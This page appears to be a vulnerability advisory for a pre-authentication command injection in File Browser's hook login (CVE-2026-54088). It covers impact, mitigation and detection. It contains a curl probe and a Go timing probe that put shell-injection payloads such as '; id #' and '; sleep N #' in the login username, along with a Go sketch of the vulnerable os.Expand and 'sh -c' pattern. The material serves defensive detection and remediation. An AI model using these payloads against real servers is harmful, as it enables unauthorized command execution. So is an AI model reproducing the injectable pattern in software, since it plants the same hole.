CVE-2026-54088
Deferred - Pending Action
Pre-authentication RCE in File Browser via Shell Command Injection

Publication date: 2026-06-25

Last updated on: 2026-06-25

Assigner: GitHub, Inc.

Description
File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.6, the Hook Authentication feature in File Browser allows administrators to delegate login verification to an external shell command. User-supplied credentials (username and password) are interpolated into this command string using os.Expand without sanitization. An unauthenticated remote attacker can inject shell metacharacters in the username or password field at the login screen, causing the server to execute arbitrary OS commands before any authentication takes place. This is a critical pre-authentication RCE. This vulnerability is fixed in 2.63.6.
Meta Information
Generated: 2026-06-26
AI Q&A: 2026-06-25
EPSS Evaluated: N/A
Affected Vendors & Products
Showing 3 associated CPEs
Vendor        Product       Version / Range
file_browser  file_browser  2.63.6
filebrowser   file_browser  up to 2.63.6 (excluding), i.e. every version before the fix
filebrowser   file_browser  2.63.6
CWE ID   Description
CWE-306  The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
CWE-78   The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
CWE-88   The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.
Compliance Impact

This vulnerability allows unauthenticated remote attackers to execute arbitrary OS commands on the server before any authentication takes place, compromising the host at the privilege level of the File Browser process. Such a compromise can result in unauthorized access to sensitive data, data exfiltration, and persistent backdoors, which directly threaten the confidentiality, integrity, and availability of data.

Because of these impacts, affected systems may fail to comply with common standards and regulations like GDPR and HIPAA, which require strict controls to protect personal and sensitive data from unauthorized access and breaches.

Organizations using vulnerable versions of File Browser with Hook Authentication enabled risk violating these regulations due to potential data breaches and loss of control over protected information.

Detection Guidance

This vulnerability can be detected by checking whether your File Browser instance runs a vulnerable version (2.63.5 or earlier) with the Hook Authentication feature enabled. Check the binary's version ('filebrowser version') and inspect the stored configuration (for example with 'filebrowser config cat') to confirm whether the authentication method is 'hook'. Instances configured with another authentication method never invoke the hook command and are not exposed to this injection, although they should still be upgraded.

Since the vulnerability is triggered by shell metacharacters in the username or password field of the login request, an active check consists of sending a crafted login attempt and observing whether the injected command runs. Note that the login response does not normally contain the hook command's output; the hook only decides whether the login succeeds, so the output of an injected 'id' is unlikely to be reflected back. A reliable probe therefore relies on an observable side effect, such as a delayed response caused by an injected 'sleep' or an out-of-band callback. Because a successful probe executes a command on the target before authentication, run it only against systems you are authorized to test, and use a harmless command.

For example, you can send the login endpoint a username containing shell metacharacters such as "; id #" to see whether the server executes the 'id' command.

A sample curl command to test this might be:

  • curl -X POST http://<filebrowser-server>/api/login -d '{"username":"; id #","password":"anything"}' -H 'Content-Type: application/json'

If the response includes the output of 'id', the system is certainly vulnerable, but a response that only reports a failed login proves nothing either way. Replacing the username with "; sleep 10 #" and timing the request is the more dependable check: a reply delayed by roughly ten seconds means the shell executed the payload.

Additionally, monitor for exploitation attempts at two levels. On the host, process-creation telemetry showing the File Browser process spawning a shell whose arguments contain metacharacters or unexpected commands is a strong indicator. At the edge, a reverse proxy or WAF that inspects POST bodies can flag login attempts whose username or password contains characters such as ';', '|', '&', '`' or '$('.
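A timing-based version of the probe described above, written as an added example for this page in Go (File Browser's implementation language); it is not File Browser code and is not part of the original advisory. It posts the same JSON body the curl example uses to /api/login twice, once with a harmless username and once with "; sleep N #", and reports the instance as likely vulnerable only when the second response is delayed by most of N. The simulated server at the bottom is a constructed stand-in so that the code runs offline; the threshold of three quarters of N, the loginRequest field set and the probe username are assumptions of the example. Against a real target a positive verdict means the instance actually executed sleep, so authorization is required.

```go
package main

import (
	"bytes"
	"context"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
	"strings"
	"time"
)

// loginRequest is the JSON body the page's curl example sends to /api/login.
type loginRequest struct {
	Username string `json:"username"`
	Password string `json:"password"`
}

// timedLogin posts one login attempt and reports how long the server took to answer.
func timedLogin(ctx context.Context, client *http.Client, baseURL string, req loginRequest) (time.Duration, error) {
	body, err := json.Marshal(req)
	if err != nil {
		return 0, err
	}
	httpReq, err := http.NewRequestWithContext(ctx, http.MethodPost, baseURL+"/api/login", bytes.NewReader(body))
	if err != nil {
		return 0, err
	}
	httpReq.Header.Set("Content-Type", "application/json")
	start := time.Now()
	resp, err := client.Do(httpReq)
	if err != nil {
		return 0, err
	}
	resp.Body.Close() // only the timing matters; the body is a login failure either way
	return time.Since(start), nil
}

// ProbeResult holds the two measurements and the verdict derived from them.
type ProbeResult struct {
	Baseline, Injected time.Duration
	LikelyVulnerable   bool
}

// ProbeHookInjection sends a harmless login, then one whose username carries
// "; sleep N #". If the hook command is built by string expansion and run by a
// shell, the second request is delayed by about N seconds. The verdict demands
// a delay of at least three quarters of N above the baseline (an assumed
// threshold) so ordinary jitter does not produce a false positive.
func ProbeHookInjection(ctx context.Context, client *http.Client, baseURL string, sleep time.Duration) (ProbeResult, error) {
	baseline, err := timedLogin(ctx, client, baseURL, loginRequest{Username: "probe", Password: "probe"})
	if err != nil {
		return ProbeResult{}, err
	}
	payload := fmt.Sprintf("; sleep %d #", int(sleep.Seconds()))
	injected, err := timedLogin(ctx, client, baseURL, loginRequest{Username: payload, Password: "probe"})
	if err != nil {
		return ProbeResult{}, err
	}
	return ProbeResult{
		Baseline:         baseline,
		Injected:         injected,
		LikelyVulnerable: injected >= baseline+sleep*3/4,
	}, nil
}

// NewSimulatedServer stands in for a File Browser instance so the probe can be
// exercised offline. It is a constructed emulation, not File Browser code: when
// vulnerable is true it behaves as if a shell had executed the injected sleep by
// delaying its 403 response; when false it answers at once, like a patched instance.
func NewSimulatedServer(vulnerable bool) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		var req loginRequest
		if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
			http.Error(w, "bad request", http.StatusBadRequest)
			return
		}
		if vulnerable && strings.HasPrefix(req.Username, "; sleep ") && strings.HasSuffix(req.Username, " #") {
			if n, err := strconv.Atoi(strings.TrimSuffix(strings.TrimPrefix(req.Username, "; sleep "), " #")); err == nil {
				time.Sleep(time.Duration(n) * time.Second)
			}
		}
		http.Error(w, "Forbidden", http.StatusForbidden)
	}))
}

func main() {
	for _, vulnerable := range []bool{true, false} {
		srv := NewSimulatedServer(vulnerable)
		res, err := ProbeHookInjection(context.Background(), srv.Client(), srv.URL, 2*time.Second)
		srv.Close()
		fmt.Printf("simulated vulnerable=%v baseline=%v injected=%v verdict=%v err=%v\n",
			vulnerable, res.Baseline, res.Injected, res.LikelyVulnerable, err)
	}
}
```

Against a live instance, pass its base URL and an http.Client whose Timeout exceeds N. A negative verdict on a hook-enabled instance is not proof of the fix, since proxies or rate limiting can mask the timing; confirm with the version check.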

Executive Summary

This vulnerability exists in File Browser versions prior to 2.63.6 in the Hook Authentication feature. The feature allows administrators to delegate login verification to an external shell command. However, the user-supplied credentials (username and password) are interpolated into that command string with os.Expand and no sanitization, so the shell that runs the command sees the credentials as part of its syntax rather than as data.

Because of this lack of sanitization, an unauthenticated remote attacker can inject shell metacharacters into the username or password fields at the login screen. This causes the server to execute arbitrary operating system commands before any authentication occurs, leading to a critical pre-authentication remote code execution (RCE) vulnerability.

This vulnerability was fixed in version 2.63.6 of File Browser.
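The mechanism the summary describes, reduced to a runnable Go sketch. This is an added example written for this page, not File Browser's code: a hook command template is filled with the submitted credentials by os.Expand and the resulting string is handed to 'sh -c', so whatever the shell finds in the username is parsed as syntax. The hardened variant keeps the administrator's argv fixed and passes the credentials to the child only through environment variables, which the shell treats as data. The placeholder names USERNAME and PASSWORD, the template, and the use of echo as a stand-in for a real login checker are assumptions of the example.

```go
package main

import (
	"context"
	"fmt"
	"os"
	"os/exec"
	"time"
)

// expandCredentials reproduces the vulnerable pattern the advisory describes:
// the administrator's command template is filled with user-supplied
// credentials via os.Expand, yielding one string that a shell will parse later.
// The placeholder names USERNAME and PASSWORD are an assumption of this example.
func expandCredentials(template, username, password string) string {
	return os.Expand(template, func(key string) string {
		switch key {
		case "USERNAME":
			return username
		case "PASSWORD":
			return password
		}
		return "" // other placeholders are deliberately not taken from the real environment
	})
}

// runInjectable executes the expanded template through sh -c. Because the
// credentials are already spliced into the command text, metacharacters in
// them (';', '|', '$(...)', backticks) are interpreted as shell syntax.
func runInjectable(template, username, password string) (string, error) {
	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()
	out, err := exec.CommandContext(ctx, "sh", "-c", expandCredentials(template, username, password)).Output()
	return string(out), err
}

// runHardened is the fix this example proposes: argv is fixed by the
// administrator and passed to exec as separate arguments (no shell re-parses
// it), and the credentials reach the child only through its environment, so a
// hook script reads $USERNAME and $PASSWORD as opaque values whatever they hold.
func runHardened(argv []string, username, password string) (string, error) {
	if len(argv) == 0 {
		return "", fmt.Errorf("empty hook command")
	}
	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()
	cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
	// Go uses the last value for a duplicated key, so these override any inherited ones.
	cmd.Env = append(os.Environ(), "USERNAME="+username, "PASSWORD="+password)
	out, err := cmd.Output()
	return string(out), err
}

func main() {
	// Constructed inputs: echo stands in for a real login checker, and the
	// username is the advisory's "; id #" pattern with a harmless command.
	const template = "echo login $USERNAME $PASSWORD"
	username := "; echo INJECTED #"
	password := "x"

	out, err := runInjectable(template, username, password)
	fmt.Printf("injectable: %q err=%v\n", out, err) // a second line "INJECTED" shows the shell ran the payload

	// The same hook script, but $USERNAME is expanded by the shell from its
	// environment at run time, so the metacharacters remain literal text.
	argv := []string{"sh", "-c", `echo "login $USERNAME $PASSWORD"`}
	out, err = runHardened(argv, username, password)
	fmt.Printf("hardened:   %q err=%v\n", out, err)
}
```

The hardened form closes the injection path in the caller only; the hook script must still quote its variables, and how File Browser interprets the hook's output and exit status is not reproduced here.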

Impact Analysis

This vulnerability can have severe impacts because it allows an unauthenticated remote attacker to execute arbitrary OS commands on the server running File Browser.

  • Compromise of the server hosting File Browser, at the privilege level of the File Browser process.
  • Unauthorized access to sensitive files managed by File Browser.
  • Potential for further attacks within the network due to server compromise.
  • Disruption of services or data loss caused by malicious commands.
Mitigation Strategies

The vulnerability is fixed in File Browser version 2.63.6. The immediate step to mitigate this vulnerability is to upgrade your File Browser installation to version 2.63.6 or later.

Until the upgrade can be performed, disable the Hook Authentication feature by switching the instance to another authentication method (for example the built-in JSON authentication); this removes the shell execution path entirely. Restricting the login endpoint to trusted networks reduces exposure but does not remove the vulnerability, because the injection requires no valid credentials.
